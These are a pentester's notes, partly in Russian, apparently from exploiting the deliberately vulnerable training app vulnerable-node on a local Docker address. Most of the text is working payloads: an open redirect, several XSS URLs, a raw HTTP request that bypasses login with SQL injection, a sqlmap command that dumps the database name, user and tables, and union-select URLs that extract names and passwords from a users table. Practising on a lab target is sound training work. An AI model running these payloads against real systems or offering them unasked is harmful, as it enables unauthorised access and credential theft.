https://github.com/cr0hn/vulnerable-node* Open Redirect: http://172.17.0.

1. https://github.com/cr0hn/vulnerable-node
2.  
3. * Open Redirect:
4. http://172.17.0.1:3000/login?returnurl=//google.com
5.  
6. * XSS:
7. http://172.17.0.1:3000/login?returnurl=/%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E%3C
8. http://172.17.0.1:3000/login?returnurl=//google.com&error=%3CIMG%20SRC=X%20ONERROR=%22alert(/XSS/)%22%3E
9. http://172.17.0.1:3000/products/search?q=%3Cimg+src%3Dx+onerror%3Dalert(/xss/)%3E
10.  
11. * SQL Injection (auth bypass):
12. POST /login/auth HTTP/1.1
13. Host: 172.17.0.1:3000
14. User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
15. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
16. Accept-Language: en-US,en;q=0.5
17. Accept-Encoding: gzip, deflate
18. Referer: http://172.17.0.1:3000/login?returnurl=&error=No%20data%20returned%20from%20the%20query.
19. Cookie: connect.sid=s%3ApyGpstoiNO2ClZ4dVErSZzTRia-2fkt8.6rfooOeqIEQpbsIj7QQWmuCTbcymiwrndPUkwrpTnig
20. Connection: close
21. Upgrade-Insecure-Requests: 1
22. Content-Type: application/x-www-form-urlencoded
23. Content-Length: 78
24.  
25. username=admin&password=qwerty%27+or+%271%27%3D%271%27+limit+1+--+x&returnurl=
26.  
27. * Time Based SQL Injection (auth; database dump):
28. Раскручиваем с помощью sqlmap вот таким запросом извлекаем имя базы, пользователя и все таблицы:
29. ~/soft/sqlmap/sqlmap.py -r nodejs-vuln.txt --techniq T --current-user --current-db --tables
30.  
31. Parameter: #1* ((custom) POST)
32. Type: AND/OR time-based blind
33. Title: PostgreSQL > 8.1 AND time-based blind
34. Payload: username=admin&password=' AND 2583=(SELECT 2583 FROM PG_SLEEP(5)) AND 'owAo'='owAo&returnurl=
35.  
36. nodejs-vuln.txt:
37. POST /login/auth HTTP/1.1
38. Host: 172.17.0.1:3000
39. User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
40. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
41. Accept-Language: en-US,en;q=0.5
42. Accept-Encoding: gzip, deflate
43. Referer: http://172.17.0.1:3000/login?returnurl=&error=No%20data%20returned%20from%20the%20query.
44. Cookie: connect.sid=s%3ApyGpstoiNO2ClZ4dVErSZzTRia-2fkt8.6rfooOeqIEQpbsIj7QQWmuCTbcymiwrndPUkwrpTnig
45. Connection: close
46. Upgrade-Insecure-Requests: 1
47. Content-Type: application/x-www-form-urlencoded
48. Content-Length: 78
49.  
50. username=admin&password=*&returnurl=
51.  
52. * SQL Injection (union based; product detector style):
53. http://172.17.0.1:3000/products/detail?id=1%27%20and%20%273018%27%3d%273018
54. http://172.17.0.1:3000/products/detail?id=1%27%20or%20%273018%27%3d%273018%27%20limit%201%20--%20x
55. http://172.17.0.1:3000/products/detail?id=1' or '3018'='3018' limit 1 -- x
56.  
57. Burp SQL detector style:
58. http://172.17.0.1:3000/products/detail?id=1' and '3018'='3018
59. http://172.17.0.1:3000/products/detail?id=1' and '3018'='3019
60.  
61. http://172.17.0.1:3000/products/detail?id=1423123%27%20union%20select%20%271%27,%272%27,%273%27,%274%27,%275%27%20from%20users%20limit%201%20--%20x
62. http://172.17.0.1:3000/products/detail?id=1423123%27%20union%20select%20%271%27,name,password,%274%27,%275%27%20from%20users%20limit%201%20--%20x
63. http://172.17.0.1:3000/products/detail?id=1423123' union select '1',name,password,'4','5' from users limit 1 -- x
64.  
65. SQL Injection:
66. http://172.17.0.1:3000/products/search?q=%27%20and%201=2%20--%20x
67. http://172.17.0.1:3000/products/search?q=' and 1=2 -- x
68. http://172.17.0.1:3000/products/search?q=' and 1=1 -- x
69.  
70. Повсеместное CSRF